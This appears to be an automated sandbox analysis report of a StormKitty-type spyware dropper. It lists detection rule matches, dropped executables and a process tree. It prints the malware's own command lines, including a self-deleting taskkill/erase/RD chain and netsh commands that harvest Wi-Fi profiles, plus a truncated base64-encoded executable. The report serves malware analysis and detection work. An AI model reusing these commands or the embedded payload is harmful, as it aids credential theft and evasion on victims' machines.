Source: 00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp, type: MEMORY Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, type: DROPPED Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, type: DROPPED Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: String function: 00B78C20 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: String function: 00B92F70 appears 391 times
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: String function: 0040E1D8 appears 44 times
Sample file is different than original file name gathered from version info
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Binary or memory string: OriginalFilename vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301495606.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000000.287885714.0000000000934000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameall.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, 00000000.00000002.301246051.0000000000E1B000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Binary or memory string: OriginalFilenameDropper.exeJ vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Binary or memory string: OriginalFilenamechormuimii.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Binary or memory string: OriginalFilenameall.exe4 vs 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Source: chormuim.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: chormuimii.exe.0.dr Static PE information: Section: .rsrc ZLIB complexity 0.998019503879
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@39/48@7/5
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Virustotal: Detection: 70%
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Metadefender: Detection: 31%
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe ReversingLabs: Detection: 74%
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe "C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe"
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe"
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe"
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: unknown Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe" Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe" Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4648)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File created: C:\Users\user\AppData\Local\Temp\svchoste.exe Jump to behavior
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchoste.exe, 00000004.00000003.303306940.0000000003971000.00000004.00000001.sdmp, nss3.dll.4.dr, sqlite3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\ProgramData\AMD Driver\taskshell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
Source: dll.exe.0.dr, Forms.cs Base64 encoded string: 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAEd8AckAAAAAAAAAAOAAAgELATAAACAAAAAIAAAAAAAAbj8AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABQ/AABXAAAAAEAAAPAEAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdB8AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAPAEAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABQPwAAAAAAAEgAAAACAAUASCYAAMwYAAADAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooAgAABipaAn4CAAAEbxQAAApvFQAACiwCFyoWKqooDwAABn4OAAAEJS0XJn4NAAAE/gYjAAAGcxkAAAYlgA4AAAQoDQAABioyFIADAAAEKBAAAAYq5n4EAAAELAEqfgsAAAQlLRcmfgoAAAT+Bh8AAAZzGQAACiWACwAABHMaAAAKJRZvGwAACm8cAAAKKqICbyEAAAoCgAQAAAR+BAAABG8iAAAKKBIAAAaABQAABAIWKCMAAAoqHgIoMgAACipW0AkAAAIoKwAACigzAAAKgAkAAAQqLnMeAAAGgAoAAAQqHgIoNAAACioucxcAAAYoNQAACipafgQAAARvIgAACn4FAAAEKBMAAAYmKi5zIgAABoANAAAEKkp+AwAABCUtAiYqAwRvCgAABioeAnslAAAEKiICA30lAAAEKh4CeyYAAAQqIgIDfSYAAAQqABswBABOAQAAAAAAAHMIAAAKgAEAAAR+AQAABHMoAAAGJXIBAABwbyUAAAYlckcAAHBvJwAABm8JAAAKfgEAAARzKAAABiVylQAAcG8lAAAGJXLrAABwbycAAAZvCQAACn4BAAAEcygAAAYlcgEAAHBvJQAABiVyFwEAcG8nAAAGbwkAAAp+AQAABHMoAAAGJXJDAQBwbyUAAAYlcokBAHBvJwAABm8JAAAKfgEAAARzKAAABiVyxQEAcG8lAAAGJXILAgBwbycAAAZvCQAACn4BAAAEcygAAAYlcm8CAHBvJQAABiVytQIAcG8nAAAGbwkAAAp+AQAABHMoAAAGJXL/AgBwbyUAAAYlckUDAHBvJwAABm8JAAAKfgEAAARzKAAABiVydQMAcG8lAAAGJXK9AwBwbycAAAZvCQAAChT+BgMAAAZzCQAABigFAAAGKAcAAAbeAybeACoAAEEcAAAAAAAAAAAAAEoBAABKAQAAAwAAAAIAAAEbMAMAnAAAAAEAABECLAcCF0CMAAAAKAoAAAoKBn4CAAAEKAsAAAosBgaAAgAABH4CAAAEC34BAAAEbwwAAAoMK0ESAigNAAAKDQlvJgAABnMOAAAKEwQRBAcoBAAABiwdBwlvJAAABm8PAAAKLQ8RBAcJbyQAAAZvEAAACgveAybeA